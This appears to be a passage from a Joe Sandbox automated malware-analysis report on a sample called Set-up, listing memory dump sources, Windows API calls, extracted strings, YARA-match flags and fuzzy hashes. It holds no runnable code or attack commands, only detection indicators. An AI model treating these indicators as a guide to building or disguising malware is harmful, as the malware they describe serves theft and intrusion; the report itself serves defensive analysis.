                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionThrow$FeaturePresentProcessor_callnewhmalloc
                                                                                          • String ID:
                                                                                          • API String ID: 3418196020-0
                                                                                          • Opcode ID: 7ad8f742c782f3cc58a308ecfbfb38f29daf7722750c1528b6af6b8050b4ff19
                                                                                          • Instruction ID: 8e60d966fed875361d07ec0eb0fde9526dd8cc4f704b883683291601e3b3cdd9
                                                                                          • Opcode Fuzzy Hash: 7ad8f742c782f3cc58a308ecfbfb38f29daf7722750c1528b6af6b8050b4ff19
                                                                                          • Instruction Fuzzy Hash: D9515F7190020D9BDB24CF99D885BBEBBF4FB44310F2485BAE525E72A0D7B4DA48CB51
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 5mD$KJML$P$kuD$ouD
                                                                                          • API String ID: 0-3954381155
                                                                                          • Opcode ID: 9be44cefbd222005b209d4c4411aba23493655a4848a45c267e2c8baec023d32
                                                                                          • Instruction ID: e27a136a7a6cab6e4fb4d1104b36678c6872b2f7f96ca154fa8c8b0adca1d076
                                                                                          • Opcode Fuzzy Hash: 9be44cefbd222005b209d4c4411aba23493655a4848a45c267e2c8baec023d32
                                                                                          • Instruction Fuzzy Hash: 56B103316083658FC715CF18889076FB7E2EBC5724F158A6CE9AA9B3D1CB719846CBC1
                                                                                          APIs
                                                                                          • SelectObject.GDI32(?,?), ref: 00A6465D
                                                                                          • SelectObject.GDI32(?,?), ref: 00A64665
                                                                                          • GetTextExtentExPointW.GDI32(?,?,?,?,00000000,?,00000000), ref: 00A64714
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectSelect$ExtentPointText
                                                                                          • String ID:
                                                                                          • API String ID: 3450274596-0
                                                                                          • Opcode ID: e0bb2264badb9adf6eae8faba9fc552015ca85e6bb47853749493465ce770b3a
                                                                                          • Instruction ID: 0a97a15af9d88492aa061c50bdb6fbe519a6b95a1f4a4ef85edf31c23acf76c7
                                                                                          • Opcode Fuzzy Hash: e0bb2264badb9adf6eae8faba9fc552015ca85e6bb47853749493465ce770b3a
                                                                                          • Instruction Fuzzy Hash: 94B1AD75A041698FCF29DF18C898AAEBBB5FF48300F1141E9E40EA7250E730AE95DF51
                                                                                          APIs
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00BFEFB5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00BFEFC4
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00BFEFCD
                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00BFEFDA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: 071e0dadfedeb8ef676e0fed8daf1f32dd4464d2f5231353e23de2df38343c6f
                                                                                          • Instruction ID: cd0fffd8adf499859857dc14e58cf255c92bb5c787af4a45f8e9f13a35c8a78c
                                                                                          • Opcode Fuzzy Hash: 071e0dadfedeb8ef676e0fed8daf1f32dd4464d2f5231353e23de2df38343c6f
                                                                                          • Instruction Fuzzy Hash: 55F05F71C14209EBCB00DBF4DA49B9EBBF8EF18305F524495A412E7150E734AB04DB51
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: pz$t$xr$|<
                                                                                          • API String ID: 0-1407822990
                                                                                          • Opcode ID: b2e4866ae2b1010d9c206b20ff9404bd9a6ecd3d3ea1e1d4e2c8e57421895b6a
                                                                                          • Instruction ID: f2fba3b84dc1d7f97bb6573a1ec92855f1fd920927e77365a883a35821f71129
                                                                                          • Opcode Fuzzy Hash: b2e4866ae2b1010d9c206b20ff9404bd9a6ecd3d3ea1e1d4e2c8e57421895b6a
                                                                                          • Instruction Fuzzy Hash: 08A11572A083504BEB14DF69CC81B6BB7D5DFC4324F09497DE99983391EB79E8088792
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Jwi$ Jwi$03$@A
                                                                                          • API String ID: 0-631218979
                                                                                          • Opcode ID: f004497ff748f9427ea0e41af61b4203306f1da8aef586faa826ad0e132aae13
                                                                                          • Instruction ID: 48cc514c74359190b49e5e31f387dccd01095d8c70a061b8e06046b616b19b9d
                                                                                          • Opcode Fuzzy Hash: f004497ff748f9427ea0e41af61b4203306f1da8aef586faa826ad0e132aae13
                                                                                          • Instruction Fuzzy Hash: 1741E77029C3408BD3248F65985278BBFF5ABD6724F044E2DE5D5AB3C1D77880069F9A
                                                                                          APIs
                                                                                          • GetKeyboardLayout.USER32(00000000), ref: 00A6D252
                                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,0000000A), ref: 00A6D267
                                                                                          • atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00A6D275
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoKeyboardLayoutLocaleatol
                                                                                          • String ID:
                                                                                          • API String ID: 216616069-0
                                                                                          • Opcode ID: 3445378b3c25f654385f4bf326eddfddfc17fc802a5d87a8e10249f5b77261c9
                                                                                          • Instruction ID: 33bcc0a8c90093e8e3cc4d7cf04bbd34cf18d94232e7c34ef509b9cf31493267
                                                                                          • Opcode Fuzzy Hash: 3445378b3c25f654385f4bf326eddfddfc17fc802a5d87a8e10249f5b77261c9
                                                                                          • Instruction Fuzzy Hash: E3F06230A003089BDF10EBB49C56BBE73A8EB04715F410499FD07DB181DA64D918DA51
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 9qv0$l$x
                                                                                          • API String ID: 0-139331711
                                                                                          • Opcode ID: 05d819120e26dc6a8e5dc01cd09b95c134e92ee9cfe96d99f457a1f6376c6207
                                                                                          • Instruction ID: 4fbde4ef08830a2190fad8b7bca3ccda48e57456318246b5a3ad20fae708a40c
                                                                                          • Opcode Fuzzy Hash: 05d819120e26dc6a8e5dc01cd09b95c134e92ee9cfe96d99f457a1f6376c6207
                                                                                          • Instruction Fuzzy Hash: 3FE10372A08380ABD3509F25DC41BAFBBE5EBD1310F08886CE98597380D679DC19DB93
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: e7w$mk$us
                                                                                          • API String ID: 0-596661717
                                                                                          • Opcode ID: 90cab4ac870081c3b081b7aea4100bec927f4a29ac8c56e8dc092ff8dffec4d4
                                                                                          • Instruction ID: 4333408b8bfcd1fd0584661be6ca0bff2ee25184e983dca1410474da9f6e4a50
                                                                                          • Opcode Fuzzy Hash: 90cab4ac870081c3b081b7aea4100bec927f4a29ac8c56e8dc092ff8dffec4d4
                                                                                          • Instruction Fuzzy Hash: CB4198B0408380AFD750CF269881B1BBBA5FBD6790F601A1CF5E51B292D771C906CF8A
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClipboardOpenSleep
                                                                                          • String ID:
                                                                                          • API String ID: 4107625934-0
                                                                                          • Opcode ID: 0b58d5fa9265ac558809d438fa7f057cc68b153b181cfb44c23b8713f19e8114
                                                                                          • Instruction ID: c1c8cf8bcf5e09ea5aac401608bae073152362c433b8ecee8c84071cf0481371
                                                                                          • Opcode Fuzzy Hash: 0b58d5fa9265ac558809d438fa7f057cc68b153b181cfb44c23b8713f19e8114
                                                                                          • Instruction Fuzzy Hash: C4E02633A0013043C6209ADDFCC4BEEA39CEBC9362B11802EE81AC31018652D90BD6E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: KJML$KJML
                                                                                          • API String ID: 0-1613884386
                                                                                          • Opcode ID: 78d47a0726b98ca59d22d5613aafd0696075c70137bd17aaef0a62e5ed0c91a5
                                                                                          • Instruction ID: 9e82476a7d9c1d6dc0b3b22bd1686050ef5cb2d5c48da4248d23729bcbe47ecc
                                                                                          • Opcode Fuzzy Hash: 78d47a0726b98ca59d22d5613aafd0696075c70137bd17aaef0a62e5ed0c91a5
                                                                                          • Instruction Fuzzy Hash: 9E91F6356083405BEB28DF28CC91FBBB3D5EB95324F1488ACE59987281EF349501CB56
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #T$WW
                                                                                          • API String ID: 0-101372553
                                                                                          • Opcode ID: 88f5084330cc64eed70a7cdc2c82ada39ae9241c0fc2674cbd227c97e90a2824
                                                                                          • Instruction ID: 1d6cab2caf3ded9c2d3bfe9e12327967bb29faa97fd2ae4bb848f36a6266d927
                                                                                          • Opcode Fuzzy Hash: 88f5084330cc64eed70a7cdc2c82ada39ae9241c0fc2674cbd227c97e90a2824
                                                                                          • Instruction Fuzzy Hash: 5B515FB4D40354AFEB20AF79CA467997E34AB06310F24819DE5986F286C739850BCFD3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 89$LKJi
                                                                                          • API String ID: 0-2183204925
                                                                                          • Opcode ID: 1ce7aeea86d95e81e9ea2b88f6bc55537f68257eaa4bf64c2722177d91bdb4d7
                                                                                          • Instruction ID: 63091f78e9b8b53d034e64ad5f972a6af0532624689e47ad35987bdeb40be1b4
                                                                                          • Opcode Fuzzy Hash: 1ce7aeea86d95e81e9ea2b88f6bc55537f68257eaa4bf64c2722177d91bdb4d7
                                                                                          • Instruction Fuzzy Hash: FE4176369083918BC714CF19CC9162BB7E2FFD5354F19899CE8C99B390DB388906CB4A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4
                                                                                          • API String ID: 0-4088798008
                                                                                          • Opcode ID: 63d4534c623bca10dcbd436a889a1263e10f8f35f82d904a7e8984189f8c59ab
                                                                                          • Instruction ID: bcb766def0babf1c9133bbc04b423ed3fcf77e198467d37168f2acaae846106a
                                                                                          • Opcode Fuzzy Hash: 63d4534c623bca10dcbd436a889a1263e10f8f35f82d904a7e8984189f8c59ab
                                                                                          • Instruction Fuzzy Hash: 3732E975A052298FDB28DF18C994BEAB7B1BF59300F0481EAD84DA7351D730AE85CF91
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CuD
                                                                                          • API String ID: 0-2925847217
                                                                                          • Opcode ID: adee5959bb9557dde77fc92beaa8b945c60b9d0d0e4017672eced2eee7a22ad1
                                                                                          • Instruction ID: 190997ef99d2f93283ed75825b44c67f04520944fe21c69c0c8e3b415b8aa432
                                                                                          • Opcode Fuzzy Hash: adee5959bb9557dde77fc92beaa8b945c60b9d0d0e4017672eced2eee7a22ad1
                                                                                          • Instruction Fuzzy Hash: C3E1A3B2A083019BC704CF28C88065AB7E6FBC8750F56CA3DE99997390E775DD459B82
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: z!"#
                                                                                          • API String ID: 0-429687905
                                                                                          • Opcode ID: cc825ced657ca0ef890b799c607a6802aa9d77f6ba3cad800c38c82e8014784b
                                                                                          • Instruction ID: cdb981c5ad77f668d0922e684d6e167c455140fba963f248c4323f7ecdb34178
                                                                                          • Opcode Fuzzy Hash: cc825ced657ca0ef890b799c607a6802aa9d77f6ba3cad800c38c82e8014784b
                                                                                          • Instruction Fuzzy Hash: E2B1FEB19183018BD764CF28C8513ABB7F5FF95324F189A2DE8868B290E738D945CB52
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0
                                                                                          • API String ID: 0-4108050209
                                                                                          • Opcode ID: f7068b3877bbd43e3ea4426833f4735d1647946ec6b424be7b25c3145e8328ed
                                                                                          • Instruction ID: c55c6f083fdcdafa2f44d1414b8ed5ad2c2b159350511dba836ad3c07649e934
                                                                                          • Opcode Fuzzy Hash: f7068b3877bbd43e3ea4426833f4735d1647946ec6b424be7b25c3145e8328ed
                                                                                          • Instruction Fuzzy Hash: 10811F37A1959047CB158E3C6CD03A9AFA36FDB334B2E8369DA719B3D5CA254805C3A1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @,
                                                                                          • API String ID: 0-608918562
                                                                                          • Opcode ID: 12d3153cb7bc255d7ca880b3807ee84f9480c9713f3ba18247162fb3f2338e07
                                                                                          • Instruction ID: 985d9bd84979b686eebebcd523a6ec131cd302b4b602a0ae1fd88c299c3427c7
                                                                                          • Opcode Fuzzy Hash: 12d3153cb7bc255d7ca880b3807ee84f9480c9713f3ba18247162fb3f2338e07
                                                                                          • Instruction Fuzzy Hash: B681E0716093518BD318DF29D88179FBBE2EBC6700F05CD2DE5D59B284DB78990ACB82
                                                                                          APIs
                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,0000000C,00000000,00000000,00000000,00C5D8B0,?,?,?,00A77BE5,00000002,?,00000000,00C0DF00,?), ref: 00A78C72
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3510742995-0
                                                                                          • Opcode ID: 128c6964776f037be6b136d8c6e949ab6fcb22be051735820dbcd0520fbde170
                                                                                          • Instruction ID: 2f8b4f383938853f2a54e9b81fafa3837cf9a7205bf1dd2d0087e3d606240929
                                                                                          • Opcode Fuzzy Hash: 128c6964776f037be6b136d8c6e949ab6fcb22be051735820dbcd0520fbde170
                                                                                          • Instruction Fuzzy Hash: 72819172A046018FC718DF2CC99546AF7E6BBD8310B54CA2EE89DDB381DA34ED45CB91
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !
                                                                                          • API String ID: 0-2553554435
                                                                                          • Opcode ID: eb5080301330f4d5b3dec2c877bc2331a13b310edc5b9c61989d81b59761e2d6
                                                                                          • Instruction ID: 0bfddfd22d6d5b19c8655e80d0f9de30f6190f0ee0588249a8cc85bfc70416eb
                                                                                          • Opcode Fuzzy Hash: eb5080301330f4d5b3dec2c877bc2331a13b310edc5b9c61989d81b59761e2d6
                                                                                          • Instruction Fuzzy Hash: 9A318573A0C3094BD3209FA8CD8531BBBD5ABD5204F1E893DE9C4D3352EAB8C9068781
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          • Opcode ID: a77470943a9c02e9c65dbe29d206042e794c5106e232cfb958642423b576ca4d
                                                                                          • Instruction ID: dc920d24f0ef3d1470b5d5b46bd533eafa406870ba0cb1c3f0d3266962acce96
                                                                                          • Opcode Fuzzy Hash: a77470943a9c02e9c65dbe29d206042e794c5106e232cfb958642423b576ca4d
                                                                                          • Instruction Fuzzy Hash: BE31FF315083008FD310DF58C8C1B6FBBF5EBC6324F54892CEA989B290D37999488B66
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: j
                                                                                          • API String ID: 0-700888311
                                                                                          • Opcode ID: 831eafa8f202f38c34efa8891d4c0540db65759e66ca8232a2ef357cb45eb41d
                                                                                          • Instruction ID: d3ae4d3ebb3852ae92fbf6b617b02298f245fec3ad974cfbce771e8ebf456f8a
                                                                                          • Opcode Fuzzy Hash: 831eafa8f202f38c34efa8891d4c0540db65759e66ca8232a2ef357cb45eb41d
                                                                                          • Instruction Fuzzy Hash: 77F03020518B808BEB374E345065777BBE4AB12218F802D9DC4EB83543D768D5468605
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 97fb968541b031e80c3fe714d96f6fb09dfad10181e87cc40de9f467a72d3e72
                                                                                          • Instruction ID: 42e8b4b0dc22d131fd9ece929e6d1cdca306fcf1e7676ccb1329722d4b9c807a
                                                                                          • Opcode Fuzzy Hash: 97fb968541b031e80c3fe714d96f6fb09dfad10181e87cc40de9f467a72d3e72
                                                                                          • Instruction Fuzzy Hash: 3042F5325083118BC725DF28E4806AEB3E2FFC4318F19C92DD9D697284E739E555D792
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a0fcbbd3b9e49f22bcd552b99b501a40e0b07a2d02f9984baf02521e964c93dc
                                                                                          • Instruction ID: e7cece9fdf283c76e88dba7f26fa93cfd0ed3adf2439c07e4dc75079d80d11b3
                                                                                          • Opcode Fuzzy Hash: a0fcbbd3b9e49f22bcd552b99b501a40e0b07a2d02f9984baf02521e964c93dc
